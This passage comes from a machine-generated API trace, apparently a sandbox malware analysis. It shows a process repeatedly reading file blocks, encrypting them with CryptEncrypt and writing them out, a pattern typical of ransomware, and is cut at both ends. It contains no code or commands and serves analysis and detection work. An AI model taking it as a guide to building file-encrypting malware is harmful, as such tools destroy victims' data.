lpOverlapped=0x0) returned 1 [0148.499] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.499] GetLastError () returned 0x0 [0148.499] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.499] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.499] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.499] GetLastError () returned 0x0 [0148.499] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.499] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.499] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.499] GetLastError () returned 0x0 [0148.499] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.499] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.499] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.499] GetLastError () returned 0x0 [0148.499] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.499] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.500] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.500] GetLastError () returned 0x0 [0148.500] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.500] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.500] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.500] GetLastError () returned 0x0 [0148.500] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.500] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.500] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.500] GetLastError () returned 0x0 [0148.500] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.500] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.500] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.500] GetLastError () returned 0x0 [0148.500] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.500] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.500] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.500] GetLastError () returned 0x0 [0148.500] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.500] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.500] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.500] GetLastError () returned 0x0 [0148.500] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.500] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.500] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.501] GetLastError () returned 0x0 [0148.501] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.501] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.501] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.501] GetLastError () returned 0x0 [0148.501] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.501] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.501] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.501] GetLastError () returned 0x0 [0148.501] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.501] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.501] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.501] GetLastError () returned 0x0 [0148.501] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.501] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.501] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.501] GetLastError () returned 0x0 [0148.501] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.501] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.501] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.501] GetLastError () returned 0x0 [0148.501] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.501] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.501] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.501] GetLastError () returned 0x0 [0148.501] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.502] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.502] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.502] GetLastError () returned 0x0 [0148.502] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.502] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.502] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.502] GetLastError () returned 0x0 [0148.502] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.502] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.502] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.502] GetLastError () returned 0x0 [0148.502] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.502] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.502] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.502] GetLastError () returned 0x0 [0148.502] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.502] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.502] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.502] GetLastError () returned 0x0 [0148.502] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.502] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.502] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.502] GetLastError () returned 0x0 [0148.502] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.502] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.503] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.503] GetLastError () returned 0x0 [0148.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.503] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.503] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.503] GetLastError () returned 0x0 [0148.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.503] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.503] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.503] GetLastError () returned 0x0 [0148.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.503] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.503] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.503] GetLastError () returned 0x0 [0148.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.503] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.503] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.503] GetLastError () returned 0x0 [0148.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.503] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.503] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.503] GetLastError () returned 0x0 [0148.503] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.503] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.503] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.504] GetLastError () returned 0x0 [0148.504] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.504] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.504] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.504] GetLastError () returned 0x0 [0148.504] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.504] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.504] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.504] GetLastError () returned 0x0 [0148.504] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.504] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.504] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: 